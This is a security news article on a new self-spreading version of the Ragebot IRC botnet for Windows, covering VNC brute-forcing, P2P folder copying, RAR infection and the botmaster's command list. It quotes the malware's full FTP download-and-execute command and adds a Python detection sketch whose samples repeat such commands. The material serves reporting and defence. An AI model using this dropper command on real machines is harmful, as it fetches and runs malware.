An unknown group/person is building a botnet using a new version of the Ragebot botnet malware, one that includes worm features that allow it to spread on its own to new devices.

The Ragebot malware came to light in April 2015, when Zscaler researchers published a blog post about new botnet malware families that still relied on IRC channels to control infected hosts, a technique that many consider rudimentary and inefficient.

Since its discovery, it appears that someone has spent some time working on the Ragebot code and has returned with a new version.

Ragebot trojan now comes with a self-spreading component

According to Russian antivirus maker Dr.Web, a new version of the Ragebot malware is currently spreading in the wild.

Compared to the old version, this one doesn't necessarily need its author to infect each and every one of its targets, but relies on a worm component that does some of the work for him.

This Ragebot worm version only targets Windows computers. Malware researchers say that once it infects a victim, Ragebot runs a command on each host:

cmd /c echo open ftp.yourserver.com 21 >> ik &echo user USERNAME PASSWORD >> ik &echo binary >> ik &echo get EXENAME.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &EXENAME.exe &exit

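This command writes a short FTP script to a local file named ik, passes it to the built-in Windows ftp client to connect to a remote server and download an executable, then deletes the script and runs the downloaded executable.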
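The command above leaves a recognizable shape in process-creation logs: an FTP script assembled with echo redirects, handed to ftp -s:, followed by execution of the fetched file. The following detection sketch is an added example, not code from Dr.Web or the article; the function names and the sample command lines other than the first are constructed, and it assumes command lines are available from process-creation logging (for example Sysmon Event ID 1 or Windows event 4688 with command-line auditing).

```python
import re

# "ftp ... -s:<file>": a scripted, non-interactive FTP session.
FTP_SCRIPT = re.compile(r"\bftp(?:\.exe)?\b[^&|]*?\s-s:(?P<script>[^\s&|]+)", re.I)
# "echo <text> > <file>" or "echo <text> >> <file>".
ECHO_REDIR = re.compile(r"\becho\s+(?P<text>[^&|>]*?)\s*>{1,2}\s*(?P<file>[^\s&|]+)", re.I)
# An FTP script line that fetches an executable.
GET_EXE = re.compile(r"^\s*(?:m?get|recv)\s+(?P<name>\S+\.exe)\b", re.I)


def analyze(cmdline):
    """Return findings if cmdline builds an FTP script with echo and feeds it to ftp -s:."""
    ftp = FTP_SCRIPT.search(cmdline)
    if not ftp:
        return None
    script = ftp.group("script").lower()
    lines = [e.group("text") for e in ECHO_REDIR.finditer(cmdline)
             if e.group("file").lower() == script]
    if not lines:
        return None  # ftp -s: with a pre-existing script file, e.g. an admin job
    fetched = [m.group("name").lower() for m in map(GET_EXE.match, lines) if m]
    segments = [s.strip().lower() for s in re.split(r"&+", cmdline)]
    return {
        "script": script,
        "fetched": fetched,
        # The downloaded file name appears as its own command in the chain.
        "runs_download": any(s == f or s.startswith(f + " ")
                             for f in fetched for s in segments),
        # The script file is deleted afterwards, leaving no FTP script on disk.
        "deletes_script": any(re.search(r"^(?:del|erase)\s.*" + re.escape(script), s)
                              for s in segments),
    }


def is_ftp_dropper(cmdline):
    """True when an echo-built FTP script fetches an .exe that the same chain then runs."""
    hit = analyze(cmdline)
    return bool(hit and hit["fetched"] and hit["runs_download"])


# Constructed samples; the first is the command quoted in the article, placeholders included.
SAMPLES = [
    "cmd /c echo open ftp.yourserver.com 21 >> ik &echo user USERNAME PASSWORD >> ik &echo binary >> ik &echo get EXENAME.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &EXENAME.exe &exit",
    r"ftp -n -s:C:\jobs\nightly_upload.txt",
    "cmd /c echo build finished >> build.log & exit",
    "cmd.exe /c echo open files.example.test > s.txt&echo get a.exe>> s.txt&ftp.exe -s:s.txt&a.exe",
]
```

Matching on the structure of the chain rather than on the file name ik or the server name keeps the rule useful when those placeholders change.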

Ragebot brute-forces VNC connections

This executable is a scanner that will look for internal subnetworks and identify hosts with connections open on port 5900, used for Virtual Network Computing (VNC) remote desktop connections.

Ragebot will then use a list of 296 passwords to brute-force the remote computer's password. If it succeeds, the worm goes back to the beginning by running the same command and downloading the VNC scanner on a new host.

To gain persistence on infected hosts, Ragebot also copies itself to multiple local folders used by ICQ and P2P clients. These are the folders where Ragebot saves itself:

\Program Files\LimeWire\Shared
\Program Files\eDonkey2000\incoming
\Program Files\KAZAA
\Program Files\Morpheus\My Shared Folder\
\Program Files\BearShare\Shared\
\Program Files\ICQ\Shared Files\
\Program Files\Grokster\My Grokster\
\My Downloads\

At this point, Ragebot also registers with its command and control (C&C) server, which is an IRC channel.

Ragebot's main IRC channel (via Dr.Web)

Ragebot's author controls all hosts by typing commands in the main IRC window. The commands available to the Ragebot botmaster are as follows:

    !commands – display information on received commands;
    !botinfo – display information about itself;
    !rarworm – infect RAR archives;
    !xpl – execute a brute force attack and infect VNC nodes;
    !p2p – infect P2P clients;
    !vncstop – stop scanning VNC hosts;
    !disconnect – break the connection;
    !reconnect – restore the connection;
    !restart – relaunch itself;
    !part – leave the specified chat channels;
    !join – connect to the IRC channel;
    !b0tk1ller – kill processes according to the list;
    !nick – name the Trojan on the IRC channel;
    !h< password > – remove or download an executable file (where password is an authorization password).

Ragebot comes with internal antivirus, RAR infector modules

Two more functions are also included with this new Ragebot version. The first is an antivirus-like feature that blocks all processes and allows only whitelisted core system applications to run.

This self-protection system isn't anything new, since the Shifu banking trojan, discovered in August 2015, also includes a similar module.

The second new Ragebot feature is the ability to search for local RAR files and inject itself inside them. This behavior is most likely used as a secondary self-propagation system.

Users unzipping these archives would find an EXE file inside them and most likely run it, thinking it was clean. Ragebot uses generic names for these EXE files, such as setup.exe, installer.exe, self-installer.exe, and self-extractor.exe.

It's been a while since we've seen this type of behavior in Windows botnet malware, which is usually spread via spam and exploit kits. The re-addition of worm-like features to botnet malware families comes after similar features were very successful in helping IoT malware propagate to millions of smart devices.